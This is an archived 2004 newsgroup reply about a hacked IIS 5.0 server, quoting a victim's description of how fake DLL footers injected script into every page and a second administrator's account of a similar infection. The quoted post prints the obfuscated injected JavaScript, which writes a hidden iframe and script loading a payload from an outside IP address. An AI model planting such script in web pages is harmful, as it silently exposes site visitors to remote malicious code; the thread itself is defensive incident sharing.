Re: Russian IIS hack? Malicious Javascript code
From: Ken (kanderson_at_pointclear.net)
Date: 06/24/04
- Next message: Need help!!!!!: "website ask for ID and password???????"
- Previous message: dh: "Re: Russian IIS hack? Malicious Javascript code"
- In reply to: Oca Hoeflein: "Russian IIS hack? Malicious Javascript code"
- Next in thread: LPD: "Re: Russian IIS hack? Malicious Javascript code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 23 Jun 2004 17:09:14 -0700
Oca Hoeflein <Oca Hoeflein@discussions.microsoft.com> wrote in message news:<F5E81692-8CC7-471B-9751-3A9C69ECB013@microsoft.com>...
> I successfully removed some malicious code from my IIS 5.0 server that may not have had all it's patches updated, but I cannot find any information on this malicious code that redirected on a random basis the users of my websites to a russian website that appeared to be down. to a domain called balamut.com
> with an IP address of 217.107.218.147 which RDNS to
> unassigned.m10-msk-ru.e-neverland.net
>
> The javascript code lived in some fake dll files in the inetsrv folder.
> One fake .dll file was created for each web on my server and in the IIS metabase the defaultdocfooter was set to each of the dll files and enabledocfooter was set to true.
>
> the offending code was embedded in every file that the website delivered and pages that had embedded .js files the javascript for those pages would not function.
>
> I have posted the offending code, mabye someone can identify this?
>
> As proof check out a google search for one of the function in the code okx12()
>
> you'll see the first link it returns is an RTF if you view the html version you'll see this code appended to the bottom of the page.
>
> <script language="JavaScript"><!--
> var qxco7=document.cookie;function gc099(n21){var
ix=qxco7.indexOf(n21+"=");if(ix==-1)return
null;ix=qxco7.indexOf("=",ix)+1;var
es=qxco7.indexOf(";",ix);if(es==-1)es=qxco7.length;return
unescape(qxco7.substring(ix,es));}function sc088(n24,v8){var today=new
Date();var expiry=new
Date(today.getTime()+600000);if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+";
expires="+expiry.toGMTString();qxco7=document.cookie;}function
okx12(){window.status="";setTimeout("okx12()",
200);}okx12();if(location.href.indexOf("https")!=0){if(gc099("trk716")==null){document.write("<script
language=\"JavaScript\"
src=\"http://217.107.218.147/dot.php\"></script><iframe
src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\"
scrolling=\"no\" frameborder=\"no\"/>");sc088("trk716","4");}}//
--></script>
Oca, We had this same thing happen to our web server this morning. Did
you find a file called Flahqj32.exe in your system32 dir? We found
this in memory and as long as it was in memory, we would get an out of
memory error everytime we tried to get into the task manager. I
renamed it and restarted the server. This file was dated today at
about the time we started having the problem. Thanks for the above
fix. It saved our !@#$%! Also I have been on the phone all day with
McAfee and I will call them tomorrow and give them your information
about this II*S exploit. I will also setup a test server tomorrow and
try to execute the Flahqj32.exe file on it and see it this was the
cause. Still wondering how this got on our web site!
Thanks again for your hard work.
Ken...
- Next message: Need help!!!!!: "website ask for ID and password???????"
- Previous message: dh: "Re: Russian IIS hack? Malicious Javascript code"
- In reply to: Oca Hoeflein: "Russian IIS hack? Malicious Javascript code"
- Next in thread: LPD: "Re: Russian IIS hack? Malicious Javascript code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
